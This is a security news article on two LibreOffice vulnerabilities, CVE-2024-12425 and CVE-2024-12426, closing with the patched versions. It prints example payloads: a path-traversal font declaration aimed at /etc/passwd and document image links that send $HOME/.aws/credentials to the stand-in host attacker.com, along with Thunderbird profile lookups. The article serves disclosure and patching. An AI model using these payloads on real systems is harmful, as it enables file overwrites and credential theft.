Tuesday, May 20, 2025
HomeCVE/vulnerabilityLibreOffice Vulnerabilities Allow Attackers to Write to Files and Extract Data

LibreOffice Vulnerabilities Allow Attackers to Write to Files and Extract Data

Published on

SIEM as a Service

Follow Us on Google News

Two critical vulnerabilities in LibreOffice (CVE-2024-12425 and CVE-2024-12426) expose millions of users to file system manipulation and sensitive data extraction attacks.

These flaws affect both desktop users opening malicious documents and server-side systems using LibreOffice for headless document processing.

CVE-2024-12425: Path Traversal Enables Arbitrary File Writes

The first vulnerability stems from improper path sanitization when handling embedded fonts in OpenDocument XML files.

- Advertisement - Google News

Attackers can craft documents containing malicious font declarations that escape LibreOffice’s temporary directory through path traversal sequences, as CodeanLabs reports.

The critical code flaw resides in EmbeddedFontsHelper::fileUrlForTemporaryFont, where user-controlled fontName values aren’t sanitized before constructing file paths:

OUString EmbeddedFontsHelper::fileUrlForTemporaryFont(const OUString& fontName) {

// ...
    path += "/user/temp/embeddedfonts/fromdocs/";
    return path + filename; // FontName contains unsanitized input
}

An attacker could exploit this by embedding a font declaration containing directory traversal sequences:

<style:font-face svg:font-family="../../../../../../../etc/passwd">
  <office:binaryData>SGVsbG8gd29ybGQ...</office:binaryData>
</style:font-face>

This writes the decoded binary data to /etc/passwd0.ttf despite the .ttf extension limitation. 

Server-side installations are particularly vulnerable as attackers could overwrite web application files or configuration scripts.

CVE-2024-12426: Variable Expansion Enables Data Exfiltration

The second vulnerability involves LibreOffice’s handling of the vnd.sun.star.expand URI scheme, which supports environment variable substitution and INI file parsing. Attackers can craft documents that leak sensitive information through manipulated URLs:

<img src="vnd.sun.star.expand:http://attacker.com?leak=$HOME/.aws/credentials">

The expansion mechanism supports recursive lookups, enabling complex data extraction chains:

<img src="vnd.sun.star.expand:${file://$HOME/.thunderbird/profiles.ini:Profile0:Path}/...">

This allows reading Thunderbird profiles, SQLite databases, and application secrets stored in environment variables. In one demonstrated attack, hackers could intercept WordPress password reset tokens from email clients by combining multiple expansion steps.

LibreOffice released patches addressing these vulnerabilities in versions:

  • 7.5.9 (Community)
  • 7.6.5 (Community)
  • 24.2.2 (Enterprise)

These vulnerabilities highlight the risks of complex document processing ecosystems, particularly when combining user-controlled content with legacy file format support.

Enterprises must maintain rigorous patch management cycles for office software components, even in server environments.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Accenture Files Leak – New Research Reveals Projects Controlling Billions of User Data

A new research report released today by Progressive International, Expose Accenture, and the Movement...

Kimsuky APT Group Deploys PowerShell Payloads to Deliver XWorm RAT

Cybersecurity researchers have uncovered a sophisticated malware campaign orchestrated by the notorious Kimsuky Advanced...

More_Eggs Malware Uses Job Application Emails to Distribute Malicious Payloads

The More_Eggs malware, operated by the financially motivated Venom Spider group (also known as...

RedisRaider Campaign Targets Linux Servers by Exploiting Misconfigured Redis Instances

Datadog Security Research has uncovered a formidable new cryptojacking campaign dubbed "RedisRaider," specifically targeting...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Accenture Files Leak – New Research Reveals Projects Controlling Billions of User Data

A new research report released today by Progressive International, Expose Accenture, and the Movement...

Kimsuky APT Group Deploys PowerShell Payloads to Deliver XWorm RAT

Cybersecurity researchers have uncovered a sophisticated malware campaign orchestrated by the notorious Kimsuky Advanced...

More_Eggs Malware Uses Job Application Emails to Distribute Malicious Payloads

The More_Eggs malware, operated by the financially motivated Venom Spider group (also known as...